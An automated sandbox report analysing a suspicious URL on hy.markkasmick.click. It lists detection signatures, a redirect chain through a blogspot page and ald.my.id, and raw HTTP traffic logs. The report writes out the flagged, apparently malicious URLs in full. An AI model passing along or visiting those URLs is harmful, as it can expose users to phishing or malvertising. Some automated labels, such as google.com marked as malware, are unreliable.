Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhn

Overview

General Information

Sample URL:https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjR
Analysis ID:1533052
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2260,i,10608258172845983546,5722045760868179073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://google.comURL Reputation: Label: malware
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef managedmethods hsforms
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef managedmethods hsforms
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef managedmethods hsforms
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef managedmethods hsforms
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/f054981c-21de-4ec6-8c5a-6dd37a6f0a15 managedmethods hsforms
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/f054981c-21de-4ec6-8c5a-6dd37a6f0a15 managedmethods hsforms
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Form action: https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/6834707/f054981c-21de-4ec6-8c5a-6dd37a6f0a15 managedmethods hsforms
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Number of links: 0
Source: https://ald.my.id/HTTP Parser: Base64 decoded: ai=CzpLmhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPkBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9x...
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Title: Cloud App Security Checklist | Google & Microsoft 365 Security does not match URL
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.youtube.com/embed/t3Gl92wBomo?feature=oembed
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.youtube.com/embed/t3Gl92wBomo?feature=oembed
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.youtube.com/embed/t3Gl92wBomo?feature=oembed
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://www.youtube.com/embed/t3Gl92wBomo?feature=oembed
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728897184780&cv=11&fst=1728897184780&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728897184905&cv=11&fst=1728897184905&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KLDE7YGZXK&gacid=1437732794.1728897184&gtm=45je4a90v879629933z8810608771za200zb810608771&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685&z=888808190
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: Iframe src: https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KLDE7YGZXK&gacid=1437732794.1728897184&gtm=45je4a90v879629933z8810608771za200zb810608771&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685&z=411358905
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728903365512&cv=11&fst=1728903365512&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728903365624&cv=11&fst=1728903365624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-PGFSK28
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KLDE7YGZXK&gacid=1437732794.1728897184&gtm=45je4a90v879629933z8810608771za200zb810608771&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685&z=411358905
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728903365512&cv=11&fst=1728903365512&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/927141988?random=1728903365624&cv=11&fst=1728903365624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: Iframe src: https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQ
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://ald.my.id/HTTP Parser: No favicon
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5HTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: No <meta name="copyright".. found
Source: https://get.managedmethods.com/cloud-application-security-checklistHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:50250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:50383 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: global trafficHTTP traffic detected: GET /cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A HTTP/1.1Host: hy.markkasmick.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imp/70341?param_3=nortb_over_ttl&nrb HTTP/1.1Host: hy.markkasmick.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: my7recovery.blogspot.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?arsae=https%3A%2F%2Fmy7recovery.blogspot.com%2F&arsae_ref= HTTP/1.1Host: ald.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://my7recovery.blogspot.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ald.my.idConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://my7recovery.blogspot.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ald.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ald.my.idConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ald.my.idConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
